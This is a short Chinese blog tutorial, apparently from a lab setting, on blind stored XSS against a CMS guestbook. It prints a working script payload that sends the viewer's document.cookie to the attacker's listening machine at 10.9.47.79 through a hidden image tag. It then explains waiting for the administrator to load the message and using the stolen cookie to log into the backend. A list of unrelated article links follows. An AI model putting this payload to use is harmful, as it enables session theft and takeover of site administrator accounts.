当前位置: 首页 > news >正文

xss 盲打

news 来源:原创 2024/9/21 19:37:03

XSS 盲打

为什么教盲打,是因为处于被动,要等待受害者触发

1.利用存储型XSS

先将代码写入留言。同时kali开启端口监听(下面IP是kali的)

<script>document.write(\'<img src=\"http://10.9.47.79/\'+document.cookie+\'\" width=0 height=0 border=0/>\')\;</script>

等待管理员访问,只要管理员访问留言板。

2.获取cms 网站后台管理员Cookie

我们就能获取到cookie信息。

3.攻击者登录后台

在控制台输入:

访问admin

成功进入

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 大语言模型的关键技术
  • ElasticSearch优化
  • 光明源@智慧公厕的卫生安全与隐私平衡!
  • 无需公网IP!部署Apache服务器与内网穿透实现公网访问
  • Java中final用法
  • Linux - 基础IO(Linux 当中的文件,文件系统调用接口,文件描述符)- 上篇
  • Amazon EC2 Serial Console 现已在其他亚马逊云科技区域推出
  • 设计模式-解释器模式(Interpreter)
  • 前后端技术栈
  • Postman模拟上传文件
  • 城市内涝积水监测,万宾科技内涝预警监测系统
  • Scala中编写多线程爬虫程序并做可视化处理
  • 在 Arduino IDE 2.0 中安装 ESP32 板(Windows、Mac OS X、Linux)
  • 离线视频ocr识别
  • JLink OB相关的一些记录
  • @angular/forms 源码解析之双向绑定
  • Angular数据绑定机制
  • bootstrap创建登录注册页面
  • Computed property XXX was assigned to but it has no setter
  • hadoop集群管理系统搭建规划说明
  • js学习笔记
  • Node.js 新计划:使用 V8 snapshot 将启动速度提升 8 倍
  • REST架构的思考
  • 阿里云爬虫风险管理产品商业化,为云端流量保驾护航
  • 诡异!React stopPropagation失灵
  • 面试总结JavaScript篇
  • 前端
  • 前端工程化(Gulp、Webpack)-webpack
  • 想写好前端,先练好内功
  • 写代码的正确姿势
  • 用 Swift 编写面向协议的视图
  • 在Docker Swarm上部署Apache Storm:第1部分
  • FaaS 的简单实践
  • ​批处理文件中的errorlevel用法
  • (C11) 泛型表达式
  • (C语言)编写程序将一个4×4的数组进行顺时针旋转90度后输出。
  • (Pytorch框架)神经网络输出维度调试,做出我们自己的网络来!!(详细教程~)
  • (动手学习深度学习)第13章 计算机视觉---微调
  • (附源码)ssm基于jsp高校选课系统 毕业设计 291627
  • (附源码)计算机毕业设计SSM疫情下的学生出入管理系统
  • (十五)使用Nexus创建Maven私服
  • (已解决)什么是vue导航守卫
  • (转)Linq学习笔记
  • (转)Linux整合apache和tomcat构建Web服务器
  • (转)机器学习的数学基础(1)--Dirichlet分布
  • .gitignore文件---让git自动忽略指定文件
  • .mysql secret在哪_MySQL如何使用索引
  • .net 8 发布了,试下微软最近强推的MAUI
  • .net core 控制台应用程序读取配置文件app.config
  • .Net Core中Quartz的使用方法
  • .Net 访问电子邮箱-LumiSoft.Net,好用
  • .net 简单实现MD5
  • .NET开源快速、强大、免费的电子表格组件
  • ::什么意思
  • [ 云计算 | AWS 实践 ] 基于 Amazon S3 协议搭建个人云存储服务